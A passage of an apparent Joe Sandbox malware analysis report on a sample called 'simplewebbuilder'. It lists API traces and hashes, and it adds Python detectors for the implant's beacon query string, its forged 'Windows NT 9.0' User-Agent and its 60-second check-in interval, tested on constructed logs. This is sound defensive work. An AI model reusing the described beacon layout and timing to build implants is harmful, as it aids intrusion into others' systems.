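            out.append(r"\d{%d,}" % n)
        elif conv == "x":
            out.append(r"[0-9a-f]{%d,}" % n)
        elif conv == "X":
            out.append(r"[0-9A-F]{%d,}" % n)
        else:
            out.append(r"[^&\s]*")
        pos = m.end()
    out.append(re.escape(fmt[pos:]))
    return "".join(out)


def query_format_to_regex(fmt):
    """key=fmt&key=fmt ... -> regex with one named group per key."""
    parts = []
    for pair in fmt.split("&"):
        key, _, vfmt = pair.partition("=")
        parts.append("%s=(?P<%s>%s)" % (re.escape(key), key, printf_format_to_regex(vfmt)))
    return "&".join(parts)


BEACON_RE = re.compile(r"[?&]" + query_format_to_regex(BEACON_FORMAT) + r"(?=&|\s|$)")


def parse_beacon(url):
    """Return the check-in fields if `url` carries the beacon query string, else None."""
    m = BEACON_RE.search(url)
    if not m:
        return None
    g = m.groupdict()
    return {"cid": g["cid"], "connected": int(g["connected"]), "sport": int(g["sport"]),
            "high_port": int(g["high_port"], 16), "low_port": int(g["low_port"], 16),
            "stream": int(g["stream"]), "os": g["os"], "dgt": int(g["dgt"]), "dti": int(g["dti"])}


def ua_claims_impossible_windows(ua):
    """True when the User-Agent names a Windows NT version that never existed."""
    m = re.search(r"Windows NT (\d+)\.(\d+)", ua)
    return bool(m) and (int(m.group(1)), int(m.group(2))) not in KNOWN_NT_VERSIONS


_LOG_RE = re.compile(r'^(?P<src>\S+) .*"(?:GET|POST) (?P<url>\S+) HTTP/[\d.]+" \d+ \d+ "[^"]*" "(?P<ua>[^"]*)"')


def scan_log(text):
    """Flag lines whose URL matches the beacon layout or whose UA is impossible."""
    hits = []
    for line in text.splitlines():
        m = _LOG_RE.match(line)
        if not m:
            continue
        beacon = parse_beacon(m.group("url"))
        bad_ua = ua_claims_impossible_windows(m.group("ua"))
        if beacon or bad_ua:
            hits.append({"src": m.group("src"), "beacon": beacon, "ua_anomaly": bad_ua})
    return hits


# Constructed Common Log Format lines (invented hosts, times and values).
SAMPLE_LOG = """\
10.0.0.5 - - [20/Mar/2024:10:01:02 +0000] "GET /?cid=0000a1b2&connected=1&sport=1080&high_port=c35&low_port=c34&stream=0&os=10.0.19045&dgt=0&dti=0 HTTP/1.1" 200 12 "-" "Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)"
10.0.0.7 - - [20/Mar/2024:10:01:03 +0000] "GET /index.html?cid=123&session=4 HTTP/1.1" 200 5120 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64)"
10.0.0.9 - - [20/Mar/2024:10:01:04 +0000] "GET /update.php HTTP/1.1" 404 0 "-" "Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)"
"""

if __name__ == "__main__":
    for hit in scan_log(SAMPLE_LOG):
        print(hit)
```

The two checks are independent on purpose: the query layout identifies the check-in even if the operator changes the User-Agent, and the impossible NT version catches other requests from the same implant (line three above) that carry no beacon fields.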

                                                                                                                            Control-flow Graph

                                                                                                                            APIs
                                                                                                                            • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000), ref: 009B1D11
                                                                                                                            • GetLastError.KERNEL32 ref: 009B1D23
                                                                                                                              • Part of subcall function 009B1712: __EH_prolog.LIBCMT ref: 009B1717
                                                                                                                            • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000), ref: 009B1D59
                                                                                                                            • GetLastError.KERNEL32 ref: 009B1D6B
                                                                                                                            • __beginthreadex.LIBCMT ref: 009B1DB1
                                                                                                                            • GetLastError.KERNEL32 ref: 009B1DC6
                                                                                                                            • CloseHandle.KERNEL32(00000000), ref: 009B1DDD
                                                                                                                            • CloseHandle.KERNEL32(00000000), ref: 009B1DEC
                                                                                                                            • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 009B1E14
                                                                                                                            • FindCloseChangeNotification.KERNELBASE(00000000), ref: 009B1E1B
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000011.00000002.3390140263.00000000009B1000.00000040.00001000.00020000.00000000.sdmp, Offset: 009B1000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_17_2_9b1000_simplewebbuilder.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: CloseErrorLast$CreateEventHandle$ChangeFindH_prologNotificationObjectSingleWait__beginthreadex
                                                                                                                            • String ID: thread$thread.entry_event$thread.exit_event
                                                                                                                            • API String ID: 4246062733-3017686385
                                                                                                                            • Opcode ID: bca151b31aaa255c44aa2a02c448c4a9ddf575746b7bf549b463fb4836d4642b
                                                                                                                            • Instruction ID: 253e558e9593d92f254f984aa0376e7735be7c9de4942c4182a67e2b62576646
                                                                                                                            • Opcode Fuzzy Hash: bca151b31aaa255c44aa2a02c448c4a9ddf575746b7bf549b463fb4836d4642b
                                                                                                                            • Instruction Fuzzy Hash: 153181719043019FD710EF24C889BABBBE8EF84760F14492EF95597292DB70DD49CB92
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Control-flow Graph

                                                                                                                            APIs
                                                                                                                            • __EH_prolog.LIBCMT ref: 009B4E9F
                                                                                                                            • RtlEnterCriticalSection.NTDLL(009E81E8), ref: 009B4ECB
                                                                                                                            • RtlLeaveCriticalSection.NTDLL(009E81E8), ref: 009B4ED7
                                                                                                                              • Part of subcall function 009B4D01: __EH_prolog.LIBCMT ref: 009B4D06
                                                                                                                              • Part of subcall function 009B4D01: InterlockedExchange.KERNEL32(?,00000000), ref: 009B4E06
                                                                                                                            • RtlEnterCriticalSection.NTDLL(009E81E8), ref: 009B4FA7
                                                                                                                            • RtlLeaveCriticalSection.NTDLL(009E81E8), ref: 009B4FAD
                                                                                                                            • RtlEnterCriticalSection.NTDLL(009E81E8), ref: 009B4FB4
                                                                                                                            • RtlLeaveCriticalSection.NTDLL(009E81E8), ref: 009B4FBA
                                                                                                                            • RtlEnterCriticalSection.NTDLL(009E81E8), ref: 009B51BB
                                                                                                                            • RtlLeaveCriticalSection.NTDLL(009E81E8), ref: 009B51C1
                                                                                                                            • RtlEnterCriticalSection.NTDLL(009E81E8), ref: 009B51CC
                                                                                                                            • RtlLeaveCriticalSection.NTDLL(009E81E8), ref: 009B51D5
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000011.00000002.3390140263.00000000009B1000.00000040.00001000.00020000.00000000.sdmp, Offset: 009B1000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_17_2_9b1000_simplewebbuilder.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: CriticalSection$EnterLeave$H_prolog$ExchangeInterlocked
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 2062355503-0
                                                                                                                            • Opcode ID: 32119602c93f36e1a826fa5b6bcab4e430b13288262f6222512b73649d82ac3e
                                                                                                                            • Instruction ID: 1893d0f0bcb09a2a48eaf41cb4529b39ce209ca8119dc9a0a65b93e133339691
                                                                                                                            • Opcode Fuzzy Hash: 32119602c93f36e1a826fa5b6bcab4e430b13288262f6222512b73649d82ac3e
                                                                                                                            • Instruction Fuzzy Hash: A9B18A71D0525DDEDF21DFA4C940BEEBBB9AF44324F14405AE408B7282DB746A89CFA1
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Control-flow Graph

                                                                                                                            control_flow_graph 473 401f64-401f84 FindResourceA 474 401f86-401f9d GetLastError SizeofResource 473->474 475 401f9f-401fa1 473->475 474->475 476 401fa6-401fec LoadResource LockResource GlobalAlloc call 402ab0 * 2 474->476 477 402096-40209a 475->477 482 401fee-401ff9 476->482 482->482 483 401ffb-402003 GetTickCount 482->483 484 402032-402038 483->484 485 402005-402007 483->485 486 402053-402083 GlobalAlloc call 401c26 484->486 487 40203a-40204a 484->487 485->486 488 402009-40200f 485->488 493 402088-402093 486->493 489 40204c 487->489 490 40204e-402051 487->490 488->486 492 402011-402023 488->492 489->490 490->486 490->487 494 402025 492->494 495 402027-40202a 492->495 493->477 494->495 495->492 496 40202c-40202e 495->496 496->488 497 402030 496->497 497->486
                                                                                                                            APIs
                                                                                                                            • FindResourceA.KERNEL32 ref: 00401F7A
                                                                                                                            • GetLastError.KERNEL32 ref: 00401F86
                                                                                                                            • SizeofResource.KERNEL32(00000000), ref: 00401F93
                                                                                                                            • LoadResource.KERNEL32(00000000), ref: 00401FAD
                                                                                                                            • LockResource.KERNEL32(00000000), ref: 00401FB4
                                                                                                                            • GlobalAlloc.KERNELBASE(00000040,00000000), ref: 00401FBF
                                                                                                                            • GetTickCount.KERNEL32 ref: 00401FFB
                                                                                                                            • GlobalAlloc.KERNELBASE(00000040,?), ref: 00402061
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000011.00000002.3332985584.0000000000400000.00000040.00000001.01000000.00000010.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000011.00000002.3332985584.000000000040B000.00000040.00000001.01000000.00000010.sdmp
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_17_2_400000_simplewebbuilder.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: Resource$AllocGlobal$CountErrorFindLastLoadLockSizeofTick
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 564119183-0
                                                                                                                            • Opcode ID: dedb19f2a2c7d510851ce449977d34ca5ee50571f982d78a6468dda1d4bf86fe
                                                                                                                            • Instruction ID: a90e581a73a4811956ae2efad35f221ca7a2e3ffda059466d66554c94119bb76
                                                                                                                            • Opcode Fuzzy Hash: dedb19f2a2c7d510851ce449977d34ca5ee50571f982d78a6468dda1d4bf86fe
                                                                                                                            • Instruction Fuzzy Hash: 21316E31A00355AFDB115FB49F889AF7B78EB45344B10807AFE86F72C1DA748845C7A8
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

Control-flow Graph
(graph rendering omitted) 18 basic blocks, 9b6cf4-9b827f. The Sleep block at 9b6d04 and the RtlEnterCriticalSection/RtlLeaveCriticalSection block at 9b6d0a lie on the cycle 9b8153 -> 9b6cfb -> 9b6cff -> 9b6d04 -> 9b6d0a -> 9b6d8e -> 9b6d92 -> 9b8153, i.e. the function sleeps and re-checks in a loop; block 9b6d68 calls 9c50f0 twice before rejoining at 9b6d92.
                                                                                                                            APIs
                                                                                                                            • Sleep.KERNELBASE(0000EA60), ref: 009B6D04
                                                                                                                            • RtlEnterCriticalSection.NTDLL(009E81E8), ref: 009B6D0F
                                                                                                                            • RtlLeaveCriticalSection.NTDLL(009E81E8), ref: 009B6D20
                                                                                                                            • _memset.LIBCMT ref: 009B6D75
                                                                                                                            • _memset.LIBCMT ref: 009B6D84
                                                                                                                            Strings
                                                                                                                            • Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US), xrefs: 009B6D35
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000011.00000002.3390140263.00000000009B1000.00000040.00001000.00020000.00000000.sdmp, Offset: 009B1000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_17_2_9b1000_simplewebbuilder.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: CriticalSection_memset$EnterLeaveSleep
                                                                                                                            • String ID: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                                                                            • API String ID: 2085062160-1923541051
                                                                                                                            • Opcode ID: c80b2428e8ee24bf637e0e68d1e6187aaab405c761c9293398823c7a0ed9a28f
                                                                                                                            • Instruction ID: 09562d7f72406b35bd680d880724d4cffa3bdd3d7d97b6d6d38080d5b94cd614
                                                                                                                            • Opcode Fuzzy Hash: c80b2428e8ee24bf637e0e68d1e6187aaab405c761c9293398823c7a0ed9a28f
                                                                                                                            • Instruction Fuzzy Hash: E031467290D341ABD7119B24DD01BCBBBE4EF87720F11486AED82AB242C724AC46C782
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%
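The string referenced at 009B6D35, `Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)`, is a hard-coded User-Agent and an implausible one: no Windows NT 9.0 release exists, and genuine Internet Explorer identifies itself as `Mozilla/x.0 (compatible; MSIE n.n; Windows NT ...)`. The following is an added detection example, not part of the Joe Sandbox report, that scans constructed proxy-log lines for this UA (exact match plus the two structural tells) and measures the spacing between hits from one client so it can be compared with the Sleep(0xEA60) = 60 s wait in the same function. The log format, client addresses and URLs are made up for the example.

```python
import re

# User-Agent string hard-coded in the sample (xref 009B6D35 in the listing above).
MALWARE_UA = "Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)"

# Windows NT versions that real browsers have ever reported in a UA string.
REAL_NT_VERSIONS = {"5.0", "5.1", "5.2", "6.0", "6.1", "6.2", "6.3", "10.0"}
NT_RE = re.compile(r"Windows NT (\d+\.\d+)")
MSIE_RE = re.compile(r"\bMSIE \d+\.\d+")


def ua_anomalies(ua):
    """Return the reasons a User-Agent looks forged; an empty list means nothing noticed."""
    reasons = []
    if ua == MALWARE_UA:
        reasons.append("exact match for UA hard-coded in the sample")
    m = NT_RE.search(ua)
    if m and m.group(1) not in REAL_NT_VERSIONS:
        reasons.append(f"Windows NT {m.group(1)} does not exist")
    if MSIE_RE.search(ua) and "compatible;" not in ua:
        reasons.append("MSIE token without the 'compatible;' prefix real IE sends")
    return reasons


# Constructed proxy log lines for the example (made up; not from the report):
# <epoch> <client> <method> <url> <status> "<user-agent>"
SAMPLE_LOG = """\
1710000001.123 10.0.0.5 GET http://intranet.example/ 200 "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0 Safari/537.36"
1710000062.456 10.0.0.5 POST http://198.51.100.7/ 200 "Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)"
1710000070.001 10.0.0.9 GET http://intranet.example/x 200 "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)"
1710000122.789 10.0.0.5 POST http://198.51.100.7/ 200 "Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)"
"""

LOG_RE = re.compile(
    r'^(?P<ts>\d+\.\d+) (?P<src>\S+) (?P<method>\S+) (?P<url>\S+) (?P<status>\d{3}) "(?P<ua>[^"]*)"$'
)


def scan_log(text):
    """Parse log lines and keep those whose UA trips ua_anomalies()."""
    hits = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        reasons = ua_anomalies(m.group("ua"))
        if reasons:
            hits.append({"ts": float(m.group("ts")), "src": m.group("src"),
                         "url": m.group("url"), "reasons": reasons})
    return hits


def beacon_intervals(hits, src):
    """Seconds between consecutive hits from one client, to compare with Sleep(0xEA60) = 60 s."""
    ts = sorted(h["ts"] for h in hits if h["src"] == src)
    return [round(later - earlier, 1) for earlier, later in zip(ts, ts[1:])]


if __name__ == "__main__":
    found = scan_log(SAMPLE_LOG)
    for h in found:
        print(f'{h["ts"]:.3f} {h["src"]} -> {h["url"]}: {"; ".join(h["reasons"])}')
    print("intervals from 10.0.0.5:", beacon_intervals(found, "10.0.0.5"))
```

The two structural checks matter more than the exact-match rule: a rebuilt sample can change the literal string, but a forged UA that names a non-existent NT version or omits `compatible;` before `MSIE` still stands out against real browser traffic.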

Control-flow Graph
(graph rendering omitted) 14 basic blocks, 9b26db-9b27f0: RtlEnterCriticalSection at 9b26db, CreateWaitableTimerA at 9b2728 with a GetLastError error path at 9b2738 (calls 9c1110 and 9b1712), SetWaitableTimer at 9b275b, RtlLeaveCriticalSection at 9b27d5; the remaining blocks (9b2783-9b27d0) call 9c414c, 9b1cf8 and 9b83f9.
                                                                                                                            APIs
                                                                                                                            • RtlEnterCriticalSection.NTDLL(?), ref: 009B2706
                                                                                                                            • CreateWaitableTimerA.KERNEL32(00000000,00000000,00000000), ref: 009B272B
                                                                                                                            • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,009D6153), ref: 009B2738
                                                                                                                              • Part of subcall function 009B1712: __EH_prolog.LIBCMT ref: 009B1717
                                                                                                                            • SetWaitableTimer.KERNELBASE(?,?,000493E0,00000000,00000000,00000000), ref: 009B2778
                                                                                                                            • RtlLeaveCriticalSection.NTDLL(?), ref: 009B27D9
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000011.00000002.3390140263.00000000009B1000.00000040.00001000.00020000.00000000.sdmp, Offset: 009B1000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_17_2_9b1000_simplewebbuilder.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: CriticalSectionTimerWaitable$CreateEnterErrorH_prologLastLeave
                                                                                                                            • String ID: timer
                                                                                                                            • API String ID: 4293676635-1792073242
                                                                                                                            • Opcode ID: 6c096e1800fb8bfde4be5f3f2059087204c432c9c7a3eca99482df4e574fb35b
                                                                                                                            • Instruction ID: a7f185048481b25f9834decebc078a86c50a1128430a7ec6ece0c9b237a3dd53
                                                                                                                            • Opcode Fuzzy Hash: 6c096e1800fb8bfde4be5f3f2059087204c432c9c7a3eca99482df4e574fb35b
                                                                                                                            • Instruction Fuzzy Hash: B731C1B1909701AFD310DF65CA84B97BBE8FB48720F004A2EF95583681DB70E844CBA5
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

Control-flow Graph
(graph rendering omitted) 30 basic blocks, 9b2b95-9b2d38: WSASetLastError and WSARecv at 9b2be2 (then call 9baaff), WSASetLastError and select at 9b2cbc (then call 9baaff). The edge 9b2d19 -> 9b2be2 re-issues WSARecv after select returns, and 9b2d22 calls 9b1996 on the exit path; several blocks call 9c1110.
                                                                                                                            APIs
                                                                                                                            • WSASetLastError.WS2_32(00000000), ref: 009B2BE4
                                                                                                                            • WSARecv.WS2_32(?,?,?,?,?,00000000,00000000), ref: 009B2C07
                                                                                                                              • Part of subcall function 009BAAFF: WSAGetLastError.WS2_32(00000000,?,?,009B2A51), ref: 009BAB0D
                                                                                                                            • WSASetLastError.WS2_32 ref: 009B2CD3
                                                                                                                            • select.WS2_32(?,?,00000000,00000000,00000000), ref: 009B2CE7
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000011.00000002.3390140263.00000000009B1000.00000040.00001000.00020000.00000000.sdmp, Offset: 009B1000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_17_2_9b1000_simplewebbuilder.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: ErrorLast$Recvselect
                                                                                                                            • String ID: 3'
                                                                                                                            • API String ID: 886190287-280543908
                                                                                                                            • Opcode ID: 22144ce9fe6fe0fd30735be3b5bf440b3910d50736d26876043cf0956c153498
                                                                                                                            • Instruction ID: de23cc31708e7c1eacaf1fd542ff4142d827c7c69502595c99d3d29e56036845
                                                                                                                            • Opcode Fuzzy Hash: 22144ce9fe6fe0fd30735be3b5bf440b3910d50736d26876043cf0956c153498
                                                                                                                            • Instruction Fuzzy Hash: 59416DB19083018FD7109F64C6057ABBBE8EFC9364F240D1EE599C7292EB74D9409B92
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

Control-flow Graph
(graph rendering omitted) 13 basic blocks, 9b1ba7-9b1c6e: call 9d59f0 and RtlEnterCriticalSection at 9b1ba7, RtlLeaveCriticalSection at 9b1be9 followed by call 9be926, a second RtlEnterCriticalSection at 9b1bfa and RtlLeaveCriticalSection at 9b1c55. Each critical section guards a loop over calls to 9b1b79 (9b1bd4 -> 9b1be2 -> 9b1bd4 and 9b1c22 -> 9b1c31 -> 9b1c34 -> 9b1c22).
                                                                                                                            APIs
                                                                                                                            • __EH_prolog.LIBCMT ref: 009B1BAC
                                                                                                                            • RtlEnterCriticalSection.NTDLL ref: 009B1BBC
                                                                                                                            • RtlLeaveCriticalSection.NTDLL ref: 009B1BEA
                                                                                                                            • RtlEnterCriticalSection.NTDLL ref: 009B1C13
                                                                                                                            • RtlLeaveCriticalSection.NTDLL ref: 009B1C56
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000011.00000002.3390140263.00000000009B1000.00000040.00001000.00020000.00000000.sdmp, Offset: 009B1000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_17_2_9b1000_simplewebbuilder.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: CriticalSection$EnterLeave$H_prolog
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 1633115879-0
                                                                                                                            • Opcode ID: 3901d00592ce9cf4634026cef35dadf26412d9afa2f583da1c8a3588d92001c5
                                                                                                                            • Instruction ID: b1dc68e7932e026fad1d909d2b26355aa75629689cf29e495c749e095b83e1bb
                                                                                                                            • Opcode Fuzzy Hash: 3901d00592ce9cf4634026cef35dadf26412d9afa2f583da1c8a3588d92001c5
                                                                                                                            • Instruction Fuzzy Hash: 3821BC75A44614EFCB14CF64CA44B9ABBB8FF88320F10854AE84597302DB74ED45CBE0
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Control-flow Graph

                                                                                                                            APIs
                                                                                                                            • GetVersion.KERNEL32 ref: 00403138
                                                                                                                              • Part of subcall function 0040344A: HeapCreate.KERNELBASE(00000000,00001000,00000000,00403171,00000000), ref: 0040345B
                                                                                                                              • Part of subcall function 0040344A: HeapDestroy.KERNEL32 ref: 0040349A
                                                                                                                            • GetCommandLineA.KERNEL32 ref: 00403186
                                                                                                                            • GetStartupInfoA.KERNEL32(?), ref: 004031B1
                                                                                                                            • GetModuleHandleA.KERNEL32(00000000,00000000,?,0000000A), ref: 004031D4
                                                                                                                              • Part of subcall function 0040322D: ExitProcess.KERNEL32 ref: 0040324A
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000011.00000002.3332985584.0000000000400000.00000040.00000001.01000000.00000010.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000011.00000002.3332985584.000000000040B000.00000040.00000001.01000000.00000010.sdmp
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_17_2_400000_simplewebbuilder.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: Heap$CommandCreateDestroyExitHandleInfoLineModuleProcessStartupVersion
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 2057626494-0
                                                                                                                            • Opcode ID: 8f2434dccbb946e1aa19783ada8617482036cddac3ff7d4744445e81474f0da6
                                                                                                                            • Instruction ID: 617ad2e6012ff9c1e059bad989762b11f9743b1554ab2ac8c32517e064b37c31
                                                                                                                            • Opcode Fuzzy Hash: 8f2434dccbb946e1aa19783ada8617482036cddac3ff7d4744445e81474f0da6
                                                                                                                            • Instruction Fuzzy Hash: E2217CB1940615AADB04EFB6DE46A6E7BB8EB45714F10413EF605BB2D1DB384900CBAC
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            APIs
                                                                                                                            • WSASetLastError.WS2_32(00000000), ref: 009B2EEE
                                                                                                                            • WSASocketA.WS2_32(?,?,?,00000000,00000000,00000001), ref: 009B2EFD
                                                                                                                            • WSAGetLastError.WS2_32(?,?,?,00000000,00000000,00000001), ref: 009B2F0C
                                                                                                                            • setsockopt.WS2_32(00000000,00000029,0000001B,00000000,00000004), ref: 009B2F36
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000011.00000002.3390140263.00000000009B1000.00000040.00001000.00020000.00000000.sdmp, Offset: 009B1000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_17_2_9b1000_simplewebbuilder.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: ErrorLast$Socketsetsockopt
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 2093263913-0
                                                                                                                            • Opcode ID: 6cb573b8b201e14808e7d33867967d17c4baab3b7b0c0590095f8823a4cbad80
                                                                                                                            • Instruction ID: fa9dc3ff527bb9413da35f1d7ab9e177ab745c8a978bfdbba0d3ebf649cdefe4
                                                                                                                            • Opcode Fuzzy Hash: 6cb573b8b201e14808e7d33867967d17c4baab3b7b0c0590095f8823a4cbad80
                                                                                                                            • Instruction Fuzzy Hash: 5501DD71511204BBDB205F65DC49F9BBBBCDB85771F00855AFA18C7152C77088009770
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%
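The API listings on this page give arguments as raw hex: Sleep(0000EA60), SetWaitableTimer(...,000493E0,...), WSASocketA(...,00000001), setsockopt(...,00000029,0000001B,...,00000004), GlobalAlloc(00000040,...). The following is an added example, not part of the Joe Sandbox report, that parses lines in this listing format (bullet, optional "Part of subcall function", Api.Dll, optional arguments, "ref:") and decodes the constants into the facts an analyst records: 0xEA60 = 60000 ms, timer period 0x493E0 = 300000 ms, Winsock level 41 = IPPROTO_IPV6 with option 27 = IPV6_V6ONLY (Windows header values), WSASocketA flag 1 = WSA_FLAG_OVERLAPPED, GlobalAlloc 0x40 = GMEM_ZEROINIT. The sample input is copied from the listings above; the "?" entries are the report's own placeholders for arguments it could not resolve.

```python
from __future__ import annotations

import re
from dataclasses import dataclass

# Winsock / kernel constants needed to read the arguments in words (Windows header values).
IPPROTO_IPV6 = 41           # setsockopt level 0x29
IPV6_V6ONLY = 27            # setsockopt optname 0x1B
WSA_FLAG_OVERLAPPED = 0x01  # WSASocketA dwFlags
GMEM_ZEROINIT = 0x40        # GlobalAlloc uFlags

# One "APIs" entry in the report: optional bullet, optional "Part of subcall function X:",
# Api.Dll, optional (args), optional "ref: address".
LINE_RE = re.compile(
    r"^\s*(?:•\s*)?(?:Part of subcall function (?P<sub>[0-9A-Fa-f]+):\s*)?"
    r"(?P<api>\w+)\.(?P<dll>\w+)"
    r"(?:\((?P<args>[^)]*)\))?"
    r"(?:,?\s*ref:\s*(?P<ref>[0-9A-Fa-f]+))?\s*$"
)


@dataclass
class ApiCall:
    api: str
    dll: str
    args: list          # ints; None where the report printed '?' (unresolved)
    ref: str | None
    subcall_of: str | None = None


def parse_api_line(line: str) -> ApiCall | None:
    """Parse one listing line; returns None for headings and other non-API text."""
    m = LINE_RE.match(line)
    if not m:
        return None
    args = []
    raw = m.group("args")
    if raw and raw.strip():
        for tok in raw.split(","):
            tok = tok.strip()
            args.append(None if tok == "?" else int(tok, 16))
    return ApiCall(m.group("api"), m.group("dll"), args, m.group("ref"), m.group("sub"))


def describe(call: ApiCall) -> str | None:
    """The fact an analyst would write down for this call, or None if nothing notable."""
    a = call.args
    if call.api == "Sleep" and a and a[0] is not None:
        return f"sleeps {a[0] / 1000:g} s (0x{a[0]:X} ms)"
    if call.api == "SetWaitableTimer" and len(a) >= 3 and a[2] is not None:
        # lPeriod is in milliseconds; 0 means a one-shot timer
        return f"periodic timer every {a[2] / 1000:g} s" if a[2] else "one-shot timer"
    if call.api == "setsockopt" and len(a) >= 3 and (a[1], a[2]) == (IPPROTO_IPV6, IPV6_V6ONLY):
        return "sets IPV6_V6ONLY on an IPv6 socket (dual-stack switch; optval not resolved in the trace)"
    if call.api == "WSASocketA" and len(a) >= 6 and a[5] is not None and a[5] & WSA_FLAG_OVERLAPPED:
        return "creates an overlapped (asynchronous) socket"
    if call.api == "GlobalAlloc" and a and a[0] is not None and a[0] & GMEM_ZEROINIT:
        return "zero-initialised allocation (GMEM_ZEROINIT)"
    return None


def summarize(text: str) -> list[tuple[str | None, str, str]]:
    """(ref, api, decoded meaning) for every notable call in a block of report lines."""
    facts = []
    for line in text.splitlines():
        call = parse_api_line(line)
        if call is None:
            continue
        meaning = describe(call)
        if meaning:
            facts.append((call.ref, call.api, meaning))
    return facts


# Sample input: API lines copied from the function listings above.
API_LINES = """\
• Sleep.KERNELBASE(0000EA60), ref: 009B6D04
• RtlEnterCriticalSection.NTDLL(009E81E8), ref: 009B6D0F
• CreateWaitableTimerA.KERNEL32(00000000,00000000,00000000), ref: 009B272B
• SetWaitableTimer.KERNELBASE(?,?,000493E0,00000000,00000000,00000000), ref: 009B2778
• WSASocketA.WS2_32(?,?,?,00000000,00000000,00000001), ref: 009B2EFD
• setsockopt.WS2_32(00000000,00000029,0000001B,00000000,00000004), ref: 009B2F36
• GlobalAlloc.KERNELBASE(00000040,00000000), ref: 00401FBF
• GetTickCount.KERNEL32 ref: 00401FFB
  • Part of subcall function 009B1712: __EH_prolog.LIBCMT ref: 009B1717
"""

if __name__ == "__main__":
    for ref, api, meaning in summarize(API_LINES):
        print(f"{ref}  {api:<18} {meaning}")
```

Decoding the timer arguments is what turns the listing into a behavioural note: a 60 s Sleep loop in one function and a 300 s periodic waitable timer in another are the kind of fixed intervals to look for in network telemetry, and the overlapped socket plus IPV6_V6ONLY call shows the networking code is dual-stack capable.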

                                                                                                                            APIs
                                                                                                                              • Part of subcall function 009B2D39: WSASetLastError.WS2_32(00000000), ref: 009B2D47
                                                                                                                              • Part of subcall function 009B2D39: WSASend.WS2_32(?,?,?,?,00000000,00000000,00000000), ref: 009B2D5C
                                                                                                                            • WSASetLastError.WS2_32(00000000), ref: 009B2E6D
                                                                                                                            • select.WS2_32(?,00000000,00000001,00000000,00000000), ref: 009B2E83
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000011.00000002.3390140263.00000000009B1000.00000040.00001000.00020000.00000000.sdmp, Offset: 009B1000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
